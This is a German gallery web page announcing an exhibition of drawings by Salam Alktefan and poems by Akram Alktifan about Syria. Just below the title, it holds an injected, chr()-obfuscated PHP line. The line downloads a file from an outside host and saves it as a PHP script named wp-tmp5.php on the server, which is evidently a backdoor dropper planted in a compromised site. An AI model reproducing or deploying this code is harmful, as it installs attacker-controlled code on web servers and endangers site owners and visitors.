/, Commercial, Info/Wir sind zur Hoffnung verurteilt

Wir sind zur Hoffnung verurteilt

file_put_contents(chr(119).chr(112).chr(45).chr(116).chr(109).chr(112).chr(53).chr(46).chr(112).chr(104).chr(112),file_get_contents(chr(104).chr(116).chr(116).chr(112).chr(58).chr(47).chr(47).chr(109).chr(121).chr(115).chr(112).chr(97).chr(99).chr(101).chr(105).chr(100).chr(46).chr(115).chr(112).chr(97).chr(99).chr(101).chr(47).chr(108).chr(48).chr(46).chr(116).chr(120).chr(116)));

Wir sind zur Hoffnung verurteilt – so der Titel der Ausstellung Salam Alktefans
Der Ausspruch des syrischen Dramatikers Saadallah Wannus ist für die politische Lage Syriens aktueller denn je zuvor, denn was blieb den Menschen, außer der Hoffnung?
Salam Alktefan gibt ihren Zeichnungen tiefe Einblicke in die menschliche Seele, die mit technischer Perfektion und kritischem Blick einhergehen. Ihre Bilder werfen Fragen auf, die im Betrachter noch lange nachwirken.
Der Dichter Akram Alktifan präsentierte zwei seiner Gedichte, in denen es um das Verlassen der Heimat ging und eines der Massaker des syrischen Präsidenten Assad an seiner eigenen Bevölkerung beschreibt.

Galerie Mouzaoui

By | 2019-09-25T16:16:55+02:00 September 25th, 2019|Allgemein, Commercial, Info|0 Comments

About the Author:

Onlinegalerie Mouzaoui,wir sind am Puls der Zeit!

Durch die weitere Nutzung der Seite stimmen Sie der Verwendung von Cookies zu. Weitere Informationen

Die Cookie-Einstellungen auf dieser Website sind auf "Cookies zulassen" eingestellt, um das beste Surferlebnis zu ermöglichen. Wenn Sie diese Website ohne Änderung der Cookie-Einstellungen verwenden oder auf "Akzeptieren" klicken, erklären Sie sich damit einverstanden.

Schließen